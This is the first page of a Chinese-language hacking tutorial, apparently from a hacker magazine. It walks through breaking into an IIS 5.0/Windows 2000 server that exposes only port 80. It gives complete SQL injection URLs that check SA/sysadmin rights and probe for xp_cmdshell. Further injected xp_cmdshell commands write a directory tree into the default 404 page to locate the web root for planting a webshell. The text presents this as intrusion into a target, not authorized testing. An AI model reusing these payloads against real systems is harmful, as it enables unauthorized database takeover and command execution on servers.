作为专业的服务器，一般只打开80端口，这在追求安全的网络环境里已经不足为奇了，许多网络管理员也放松了警惕，以为这铜墙铁壁的系统真的无懈可击了。真得是如此吗?我们通过对某一类似服务器进行渗透打破这种观念。

　　首先我们要对服务器进行信息收集，先拿出扫描工具对要测试的站点进行扫描，对方只提供WEB服务，开了80端口，其它信息一无所知，即使连对方的操作系统类型都不知道。这样的系统不知道装了N重防火墙或者IDS，直接从系统入侵根本不可能。我们还是从HTTP头探测我们所要的信息吧。对方的IIS版本号是IIS5.0，加上服务器上的ASP脚本，可大致判断对方是Windows 2000系统。知道这些信息对我们基于脚本下的入侵已经足够了。

　　我们知道，一般网络管理员，只是负责对系统安全进行维护，至于脚本程序是由程序员编写的，他们大多数不会注意脚本的安全性，而且也不太可能什么都懂，从而使服务器有了SQL Injection的问题。很不幸，我也发现了一个：

　　http://www.target.com/show.asp?id=1234'

　　返回如图1所示。

　　图1

　　初步判断主机存在SQL注入漏洞，再次提交URL，确定服务器的连接权限：

　　http://www.target.com/show.asp?id=1234 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))

　　返回正常，表明当前连接的账号是服务器Sysadmin权限。试试SA权限，根据我的经验，这样重重防护的服务器除非没有脚本问题，一旦有，就很大可能是SA权限的连接：

　　http://www.target.com/show.asp?id=1234 and 'sa'=(SELECT System_user)

　　返回正常，表明我的猜测是对的，它是用SA连接的，权限比系统管理员还高，再看看我们最喜欢的Xp_cmdshell存在存在：

　　http://www.target.com/show.asp?id=1234 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')

　　返回正常，表明Xp_cmdshell扩展存储过程没有被删除。接下来就是最重要的工作了，虽然现在我们的权限级高，但由于对方防火墙的限制，我们除了80端口外无法和服务器进行通信，而且执行的CMD命令还没有回显。面对这种僵局，网上方法很多，基本上都是取得WEB的物理路径然，后Echo或Backup一个ASP木马到WEB目录下，得到WwbShell。其中简单的方法要属要饭兄的读注册表的方法了，但是他读取服务器WEB绝对路径一点，只有在默认安装的时候才会正确读取。也就是说注册表里面存储的只是在安装IIS时的WEB绝对路径，而如果用户对这个路径进行修改的话，注册表内的值仍然是不变的，因此即使你把木马按照臭要饭的那种方法上传上去也是没有办法找到并执行的。

　　关于这个方法，大家可以在黑防前期杂志里看到，我就不再重复了。我现在要讲的是一个全新的方法来取得WEB的物理路径，大家要看好了啊。

　　第一步我们要做的是在域名下随便输入一个不存在的页面，显然服务器会返回给我们404未找到的错误页面。如果管理员没有修改默认的错误页面，我们基本上就可以通过它来取得WebShell了。

　　脚本小子：错误页面的默认位置是C:\winnt\help\iisHelp\common\目录，这是Windows 2000系统的默认路径，Windows 2003和Windows xp默认路径应该是C:\wondows\help\iisHelp\common\，其中404错误重定向到的文件是C:\winnt\help\iisHelp\common\404b.htm(windows2000)，C:\windows\help\iisHelp\common\404b.htm(windowsXP)，这里默认是将C盘作为系统盘得到的物理路径。

　　好了，为了保险起见，我们先让服务器返回这个错误页面并将它保存起来，用来恢复修改后的服务器上的页面。好了，看好下面的提交：

　　http://www.target.com/show.asp?id=1234;exec master.dbo.xp_cmdshell 'tree d:\ >>c:\winnt\help\iisHelp\common\404b.htm';--

　　等待一会儿，因为这个命令执行的很慢。我们随便访问一个不存在的页面，使服务器返回这个页面，如果没有变化，不要着急，在保证命令没有出错的前提下继续提交：

　　http://www.target.com/show.asp?id=1234;exec master.dbo.xp_cmdshell 'tree d:\ >>c:\wondows\help\iisHelp\common\404b.htm';--

　　或

　　http://www.target.com/show.asp?id=1234;exec master.dbo.xp_cmdshell 'tree d:\ >>d:\winnt\help\iisHelp\common\404b.htm';--

　　或

　　http://www.target.com/show.asp?id=1234;exec master.dbo.xp_cmdshell 'tree d:\ >>d:\wondows\help\iisHelp\common\404b.htm';--

[1] [2] [3] 下一页